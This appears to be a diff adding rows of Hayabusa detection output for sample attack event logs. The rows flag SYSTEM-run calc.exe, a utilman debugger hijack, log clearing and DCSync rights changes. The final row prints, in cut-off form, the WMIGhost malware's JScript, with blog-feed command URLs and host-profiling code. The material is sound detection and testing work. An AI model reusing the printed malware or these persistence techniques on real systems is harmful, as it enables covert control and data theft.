+2019-03-20 08:18:55.224 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1100 | PGUID: 365ABB72-77DE-5C91-0000-00105EA30100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.224 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.404 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1308 | PGUID: 365ABB72-77FC-5C91-0000-0010E8C10100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.404 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.514 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1560 | PGUID: 365ABB72-781A-5C91-0000-001013CD0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.514 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.544 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1696 | PGUID: 365ABB72-7838-5C91-0000-0010E0D60100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.544 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.594 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 316 | PGUID: 365ABB72-7856-5C91-0000-00109FE20100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.594 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.654 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: gpscript.exe /Logon | Process: C:\Windows\System32\gpscript.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | LID: 0x17dad | PID: 1028 | PGUID: 365ABB72-785E-5C91-0000-001031E60100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.654 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\userinit.exe | Process: C:\Windows\System32\userinit.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x17dad | PID: 1152 | PGUID: 365ABB72-785E-5C91-0000-0010C5E60100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.725 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\Explorer.EXE | Process: C:\Windows\explorer.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\userinit.exe | LID: 0x17dad | PID: 1928 | PGUID: 365ABB72-785E-5C91-0000-00103FEA0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.805 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe $(Arg0) | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 256 | PGUID: 365ABB72-7874-5C91-0000-0010F1020200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.835 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1264 | PGUID: 365ABB72-7874-5C91-0000-0010130B0200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.835 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.965 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\Sysmon.exe | Process: C:\Windows\Sysmon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 988 | PGUID: 365ABB72-7892-5C91-0000-0010DE160200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:56.055 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 584 | PGUID: 365ABB72-7893-5C91-0000-0010441C0200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:56.055 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:56.376 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 832 | PGUID: 365ABB72-78B1-5C91-0000-001001300200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:56.376 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:56.406 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\wlms\wlms.exe | Process: C:\Windows\System32\wlms\wlms.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1736 | PGUID: 365ABB72-78CF-5C91-0000-0010F23A0200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:56.626 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\unsecapp.exe -Embedding | Process: C:\Windows\System32\wbem\unsecapp.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 1596 | PGUID: 365ABB72-78CF-5C91-0000-0010BE4B0200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:57.237 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\UI0Detect.exe | Process: C:\Windows\System32\UI0Detect.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2180 | PGUID: 365ABB72-78D0-5C91-0000-00108A650200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:57.627 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x17dad | PID: 2332 | PGUID: 365ABB72-78D0-5C91-0000-0010F6710200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:58.278 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key"" | Process: C:\Windows\System32\cmd.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x17dad | PID: 2572 | PGUID: 365ABB72-78D2-5C91-0000-0010D8A50200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:58.288 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\PSEXESVC.exe"" | Process: C:\Windows\PSEXESVC.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x17dad | PID: 2584 | PGUID: 365ABB72-78D2-5C91-0000-0010FFAB0200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:58.489 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: msg * ""hello from run key"" | Process: C:\Windows\System32\msg.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key"" | LID: 0x17dad | PID: 2692 | PGUID: 365ABB72-78D3-5C91-0000-0010B0D30200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:58.989 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x17dad | PID: 2844 | PGUID: 365ABB72-78D6-5C91-0000-0010CE170300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:19:04.187 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe SYSTEM | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3188 | PGUID: 365ABB72-78E8-5C91-0000-001054030400,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:19:10.796 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Process: C:\Windows\System32\mmc.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x17dad | PID: 3328 | PGUID: 365ABB72-78EE-5C91-0000-0010273F0400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:20:19.155 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x17dad | PID: 3496 | PGUID: 365ABB72-7933-5C91-0000-00100AD30600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:20:19.205 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\system32\utilman.exe | PID: 3508 | PGUID: 365ABB72-7933-5C91-0000-0010B7D40600,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:20:19.205 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x17dad | PID: 3508 | PGUID: 365ABB72-7933-5C91-0000-0010B7D40600,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:20:19.295 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""c:\osk.exe"" | Process: C:\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x17dad | PID: 3520 | PGUID: 365ABB72-7933-5C91-0000-00103CDB0600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:21:01.325 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Program Files\Windows Media Player\wmpnetwk.exe"" | Process: C:\Program Files\Windows Media Player\wmpnetwk.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 3836 | PGUID: 365ABB72-795D-5C91-0000-00105C070700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:21:48.323 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x17dad | PID: 2004 | PGUID: 365ABB72-798B-5C91-0000-0010C8550A00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:23:41.105 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x17dad | PID: 3428 | PGUID: 365ABB72-79FC-5C91-0000-0010DBC60A00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:24:08.294 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\System32\Tasks\Microsoft\Windows Defender\MP Scheduled Scan | Process: C:\Windows\system32\svchost.exe | PID: 1040 | PGUID: 365ABB72-7781-5C91-0000-0010C2CC0000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:34:25.894 +09:00,PC01.example.corp,104,high,Evas,System Log File Cleared,User: user01,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_104_system_log_cleared.evtx
+2019-03-20 08:35:07.524 +09:00,PC01.example.corp,1102,high,Evas,Security Log Cleared,User: user01,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_1102_security_log_cleared.evtx
+2019-03-25 18:09:14.916 +09:00,DC1.insecurebank.local,1102,high,Evas,Security Log Cleared,User: bob,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ACL_ForcePwd_SPNAdd_User_Computer_Accounts.evtx
+2019-03-26 06:28:11.073 +09:00,DC1.insecurebank.local,1102,high,Evas,Security Log Cleared,User: bob,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.022 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.022 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-04-04 03:11:54.098 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Users\user01\Desktop\WMIGhost.exe"" | Process: C:\Users\user01\Desktop\WMIGhost.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xaaf2b | PID: 3328 | PGUID: 365ABB72-F76A-5CA4-0000-0010FA0D1700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx
+2019-04-04 03:11:54.098 +09:00,PC04.example.corp,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx
+2019-04-04 03:11:54.178 +09:00,PC04.example.corp,20,info,,WMI Event Consumer Activity,"Modified | Type: Script | Name: ""ProbeScriptFint"" | Dst: ""var sXmlUrl=\""http://kumardeep.sosblogs.com/The-first-blog-b1/RSS-b1-rss2-posts.htm;http://blogs.rediff.com/anilchopra/feed/;http://www.blogster.com/kapoorsunil09/profile/rss\"";var sOwner='XDD';var MAIN=function(){$=this;$.key='W';$.sFeedUrl=sXmlUrl;$.sOwner=sOwner;$.sXmlUrl='';$.oHttp=null;$.oShell=null;$.oStream=null;$.sHostName=null;$.sOSType=null;$.sMacAddress=null;$.sURLParam=null;$.version='2.0.0';$.runtime=5000;$.oWMI=null;$._x=ActiveXObject;};MAIN.prototype={InitObjects:function(){$.oWMI=GetObject('winmgmts:{impersonationLevel=impersonate}!\\\\\\\\.\\\\root\\\\cimv2');$.oShell=new $._x('WScript.Shell');$.oStream=new $._x('ADODB.Stream');$.GetOSInfo();$.GetMacAddress();$.GenerateUrlParam();},WMI:function(sql){return $.oWMI.ExecQuery(sql);},GetOSInfo:function(){var e=new Enumerator($.WMI('Select * from Win32_OperatingSystem'));if(!e.atEnd()){var item=e.item();$.sOSType=item.Caption+item.ServicePackMajorVersion;$.sHostName=item.CSName;}},GetMacAddress:function(){var e=new Enumerator($.WMI('Select * from Win32_NetworkAdapter where PNPDeviceID like \\\""%PCI%\\\"" and NetConnectionStatus=2'));if(!e.atEnd()){$.sMacAddress=e.item().MACAddress;}},GenerateUrlParam:function(){var time=new Date();$.sURLParam='cstype=server&authname=servername&authpass=serverpass&hostname='+$.sHostName+'&ostype='+$.sOSType+'&macaddr='+$.sMacAddress+'&owner='+$.sOwner+'&version='+$.version+'&runtime='+$.runtime;$.sURLParam+='&t='+time.getMinutes()+time.getSeconds();},CleanObjects:function(){$.oShell=null;$.oStream=null;var e=new Enumerator($.WMI('Select * from Win32_Process where Name=\\\""scrcons.exe\\\""'));while(!e.atEnd()){e.item().terminate();e.moveNext();}},Decode:function(sourceStr){var 